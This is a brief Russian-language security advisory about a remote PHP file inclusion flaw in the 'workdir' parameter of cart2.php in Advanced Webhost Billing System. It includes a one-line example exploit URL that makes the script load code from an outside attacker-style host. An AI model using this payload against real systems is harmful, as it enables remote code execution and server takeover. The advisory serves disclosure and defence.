Программа: Advanced Webhost Billing System (AWBS)

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «workdir» сценарием cart2.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://localhost/[gpb_path]/docs/front-end-demo/cart2.php?workdir=http://sh3ll.com/for.txt?



Оставить мнение